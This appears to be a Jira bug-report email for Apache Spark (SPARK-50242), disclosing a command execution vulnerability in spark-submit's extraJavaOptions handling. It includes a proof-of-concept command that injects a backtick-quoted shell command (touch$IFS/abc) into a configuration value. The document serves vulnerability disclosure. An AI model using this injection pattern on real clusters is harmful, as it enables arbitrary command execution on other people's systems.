Lu jiadong created SPARK-50242:
----------------------------------
Summary: Command Execution Vulnerability in CAE
Key: SPARK-50242
URL: https://issues.apache.org/jira/browse/SPARK-50242
Project: Spark
Issue Type: Bug
Components: Spark Submit
Affects Versions: 3.5.3
Reporter: Lu jiadong
CAE allow user to submit jar packet and set extraJavaOptions ,
but spark has incomplete check of it, leading to command execution.
using below command can see the /abc file was created:
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
